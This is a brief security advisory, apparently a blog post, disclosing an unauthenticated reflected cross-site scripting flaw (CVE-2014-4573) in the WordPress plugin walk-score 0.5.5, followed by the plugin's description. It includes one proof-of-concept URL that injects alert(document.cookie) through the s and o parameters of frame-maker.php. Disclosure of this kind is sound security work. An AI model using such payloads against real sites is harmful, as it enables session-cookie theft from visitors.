wp-plugin : walk-score – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : walk-score

 

Effected Version : 0.5.5 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/walk-score/frame-maker.php?a=a&s=s’>alert(document.cookie)&id=id&o=o’>alert(document.cookie)&

 

Vulnerable Parameter : s, o

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4573

 
Plugin Description :
 
Provides WordPress shortcodes for embedding [Walk Score Neighborhood Maps](http://www.walkscore.com/professional/neighborhood-map.php?utm_source=wspi) in your posts and pages. Walk Score Neighborhood Maps display a map for any address that shows a property's location on a map, Walk Score (0-100 score measuring how walkable the location is) and nearby amenities. With the interactive map your visitors can create a Commute Report showing drive times to work to that location, explore lists of amenities by category (schools,restaurants, coffee shops, etc). The map displays a Google map by default, but offers your visitors options to use Street View (Google), Bird's Eye view (Bing), a walkability heat map and a 15-minute walkability zone (walkshed).

Features in Walk Score 0.5 series include:

* Embed neighborhood maps in posts.
* Set default sizes (small, medium or large) and format (vertical or horizontal)
* Override default settings in the shortcode for a specific post

You'll need a [Walk Score ID](http://www.walkscore.com/professional/sign-up.php?utm_source=wspi) to use it this plugin.  The ID is free for personal blogs, with paid subscriptions you can remove ads and outbound links.

Leave a Reply

Your email address will not be published. Required fields are marked *